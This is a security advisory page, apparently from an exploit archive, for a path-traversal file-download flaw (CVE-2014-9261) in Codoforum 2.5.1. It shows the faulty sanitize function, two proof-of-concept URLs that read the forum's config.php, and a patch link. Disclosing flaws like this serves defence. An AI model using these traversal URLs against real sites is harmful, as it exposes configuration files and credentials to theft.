Codoforum 2.5.1 Arbitrary File Download

2015.03.11

Credit: Kacper Szurek

Risk: High

Local: No

Remote: Yes

CVE: CVE-2014-9261

CWE: CWE-200

Ogólna skala CVSS: 5/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Brak

Wpływ na dostępność: Brak

# Exploit Title: Codoforum 2.5.1 Arbitrary File Download
# Date: 23-11-2014
# Software Link: https://codoforum.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9261

1. Description
  
str_replace() is used to sanitize file path but function output is not assigned to variable

private function sanitize($name) {

    str_replace("..", "", $name);
    str_replace("%2e%2e", "", $name);

    return $name;
}

http://security.szurek.pl/codoforum-251-arbitrary-file-download.html

2. Proof of Concept

http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php
or
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php

3. Solution:
  
Use patch:

https://codoforum.com/upgrades/codoforum.v.2.6.up.zip

Referencje:

https://codoforum.com/upgrades/codoforum.v.2.6.up.zip

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Codoforum 2.5.1 Arbitrary File Download

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.